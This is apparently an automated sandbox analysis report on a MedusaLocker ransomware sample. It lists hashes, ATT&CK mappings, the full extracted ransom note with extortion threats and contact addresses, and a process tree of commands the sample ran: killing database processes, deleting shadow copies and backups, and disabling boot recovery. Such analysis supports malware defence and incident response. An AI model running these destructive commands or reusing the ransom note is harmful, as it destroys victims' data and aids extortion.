medusalocker | f73508dfaf27c9eaeccf20fde21c0292202ad65bf16c4c0c2285fc4f24f933d6

Analysis

max time kernel
0s
max time network
179s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240221-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23-02-2024 00:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

33.out
Size

1.8MB
MD5

3d0c932d0eab4d6c5ce08b9ce2b7d335
SHA1

b1058433c97fdee8bbad3e393515b4c5dfb4756a
SHA256

f73508dfaf27c9eaeccf20fde21c0292202ad65bf16c4c0c2285fc4f24f933d6
SHA512

48f115dd25805ef59c508c7f193dc56c9a0fb7b2798e6628b1a89573e34a1ad1f094f52b508e6e196f6dbc326587a211dfb04ef64226976f66a5e179ae5c847c
SSDEEP

24576:SBHZBBnZ7xWVcvcD6U7yZJet53ob5XKh2ZQ21:yBndxWVZD6U7yZAtJob5XC2ZQ21

Score

10^/10

medusalocker ransomware

Malware Config

Extracted

Path

/mnt/How_to_back_files.html

Family

medusalocker

Ransom Note

Your personal ID: hDlf2smblbFKX5ktLW0EvzpSzlo4bsYq36XTMOdaZyuhQ2nzq+hvZbYeQhzWukHqDzXHaOR3kWwHIU0iqRs2F4i646UCSD0f4zWJFBtUFOhmlAfsrbrFOA1UBWePiTRUfZymx0r/bLdv8r0I8dmyUjp/yjfkPB8VbowPwVjcM+q/HDSKNmJBs7iDH54hnIium3G6zLeCkCuATKoHX/8V47mDVLTORagae8ELKZ2Vn2B4DeYWlGapAEzttEOl3ehmBomtVCN8IRi93yrTtqf15CcujNgngp9evF0Gi9zFRRYaFA7M11CJzKJux0Nqe6Y2x5qx7EuskGyxTXkb9G8SdPefZCAFfBNTDDq9QjgYko41U0PraJGg3jUwyHfGcBDf6Gj+sFHW+wnM5T4XryTqx1nO+1UMdxDannc70LZ0BhoEnMaACb76FVkXzFS4SqESEF8c85Lmfhk7cbhhcofStph/JG+B7lBD3NlRh32bN2wLCqBYJe3Pt51LNAZ5zKbrD4vx7XW1bgJk90NURDcX6zh4oEmAMSOwRbxWaEK3DT/A6CNtuiyTp71APr51uKQnenjtIifTO9AGql8hH/qzlJx474fMlrIHuKSqRVYxksek0QWTl/eMrmtweckBxjtdbZlc05SCJE5V9t2OXMC1xglZpTgw5ES0VRyg6EpXydtFTuumeuXhPm875Q/5M4nC3Q5gjQwYvXuh5C8kbsXeCJnc/dF8bnI/PW4LfGWI91ZrAyfZY1vGHdc0rm8hIIjJCYPVdw+zqIBj1ZKj1W/TSD7EEmCERAo4QRh+nJJjCQuzy0VLHmbxkmP/+lRIVGIPCxP7vxmX3NvVywWZfxrLJgumEAbOdjtLoqVTYmlS/J5cDjapYv75u219+uoBW/wyuEEAZpYmIZbMULqb6RnFES9Wjl7X3cp4mxcCUn1vL113+RR11RRd4MLv0JEvv6AYYx7i7B4QH9B4L0W0ESsDRc+/ta3WOGkd/Yo7WHbook9ciWO2HR72pT734S53bR3yW8Q/E8CQhI1HjFi8vTetw95MawbuHpmXah+hE+k/rQLlOG+/M6txhGmJRekZ/mFl0ESt1h+pubEW8W51Ce4P9y75eof1rDxxfhzf9hRa+Y3mibwp1IwLbcKelYdek+JlPfVoGngIVyGa7e/5d78fBTSVR/Nqu7HTRhJ1OodzbNi9WO/ZKoLRMGuV2HN8NG4ide1oQ4Jsy19edSAC+72TEP+xDOZ4AQaXstED6Mx3Ucu+uNkXFyhGd9Z74pl4PRw9RtZSZqJ+3NO8PqmaYm/qsT5r2HD/uESZNjXxWp4mE/Jopw4GwUhFWCBS4W0J5IK/L6y62vHmcnj/sZOh2NBprO012r2PfXIcWpccI+TJxRRf2YkCkyY1nDqu0Un7/jgMjCTtSQoEtkwcPITKLhspsApA3NzbYou/bnkUaWrC518npouEBX4psqTIZZ1QZYdsv2Ym8hUXtpD+PMuYm01pAu4RBg17kQhlKa5flSQ/yLYBEr+eBqrb1qkuDUewrt7Kz8nc6e2yZji2rxVdv3Jxn32bcsXtC5C6pxf1bvq/1buFi9107+rkk819RTDNPPyg9toLMjkDxO5t6T5ZDflU9k9e7+sPnPdEFfJUiFN0qm1wUQT/WDRmepcoXHDwhqN1JlWOfZfyBqqWWat4PHGrpNRDM8d44fOUzq6LBFThRSo= /!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\ All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. Contact us for price and get decryption software. email: [email protected] [email protected] * To contact us, create a new free email account on the site: protonmail.com IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. * Tor-chat to always be in touch: qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion

Emails

[email protected]

Signatures

MedusaLocker
Ransomware with several variants first seen in September 2019.
ransomware medusalocker

Reads CPU attributes 1 TTPs 1 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	33.out

/tmp/33.out
/tmp/33.out
1⤵
- Reads CPU attributes
PID:1549
- /bin/sh
  sh -c "rem Kill \"SQL\""
  2⤵
  PID:1551
- /bin/sh
  sh -c "taskkill -f -im sqlbrowser.exe"
  2⤵
  PID:1552
- /bin/sh
  sh -c "taskkill -f -im sql writer.exe"
  2⤵
  PID:1553
- /bin/sh
  sh -c "taskkill -f -im sqlserv.exe"
  2⤵
  PID:1554
- /bin/sh
  sh -c "taskkill -f -im msmdsrv.exe"
  2⤵
  PID:1555
- /bin/sh
  sh -c "taskkill -f -im MsDtsSrvr.exe"
  2⤵
  PID:1556
- /bin/sh
  sh -c "taskkill -f -im sqlceip.exe"
  2⤵
  PID:1557
- /bin/sh
  sh -c "taskkill -f -im fdlauncher.exe"
  2⤵
  PID:1558
- /bin/sh
  sh -c "taskkill -f -im Ssms.exe"
  2⤵
  PID:1559
- /bin/sh
  sh -c "taskkill -f -im SQLAGENT.EXE"
  2⤵
  PID:1560
- /bin/sh
  sh -c "taskkill -f -im fdhost.exe"
  2⤵
  PID:1561
- /bin/sh
  sh -c "taskkill -f -im ReportingServicesService.exe"
  2⤵
  PID:1562
- /bin/sh
  sh -c "taskkill -f -im msftesql.exe"
  2⤵
  PID:1563
- /bin/sh
  sh -c "taskkill -f -im pg_ctl.exe"
  2⤵
  PID:1564
- /bin/sh
  sh -c "taskkill -f -impostgres.exe"
  2⤵
  PID:1565
- /bin/sh
  sh -c "net stop MSSQLServerADHelper100"
  2⤵
  PID:1566
- /bin/sh
  sh -c "net stop MSSQL\$ISARS"
  2⤵
  PID:1567
- /bin/sh
  sh -c "net stop MSSQL\$MSFW"
  2⤵
  PID:1568
- /bin/sh
  sh -c "net stop SQLAgent\$ISARS"
  2⤵
  PID:1569
- /bin/sh
  sh -c "net stop SQLAgent\$MSFW"
  2⤵
  PID:1570
- /bin/sh
  sh -c "net stop SQLBrowser"
  2⤵
  PID:1571
- /bin/sh
  sh -c "net stop REportServer\$ISARS"
  2⤵
  PID:1572
- /bin/sh
  sh -c "net stop SQLWriter"
  2⤵
  PID:1573
- /bin/sh
  sh -c "vssadmin.exe Delete Shadows /All /Quiet"
  2⤵
  PID:1574
- /bin/sh
  sh -c "wbadmin delete backup -keepVersion:0 -quiet"
  2⤵
  PID:1575
- /bin/sh
  sh -c "wbadmin DELETE SYSTEMSTATEBACKUP"
  2⤵
  PID:1576
- /bin/sh
  sh -c "wbadmin DELETE SYSTEMSTABACKUP -deleteOldest"
  2⤵
  PID:1577
- /bin/sh
  sh -c "wmic.exe SHADOWCOPY /nointeractive"
  2⤵
  PID:1578
- /bin/sh
  sh -c "bcdedit.exe /set {default} recoverynabled No"
  2⤵
  PID:1579
- /bin/sh
  sh -c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
  2⤵
  PID:1580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/mnt/How_to_back_files.html

Filesize
5KB

MD5
0cbcb77cc1512f6a7209d03124648adf

SHA1
cfe747222652876333f3a1903f165cdbf940674b

SHA256
e16581fb1611f823c6600bca87a82fb3c2979c22e06215518f5586b795db761f

SHA512
6fc29bb7c76392b13910fb415af420e3bb8a1c26aa0386cd1ba39ae08309493698e9b83eacb21e4d192da685a552a6c9b53240e956c56d97ef20657027373472

Download Submit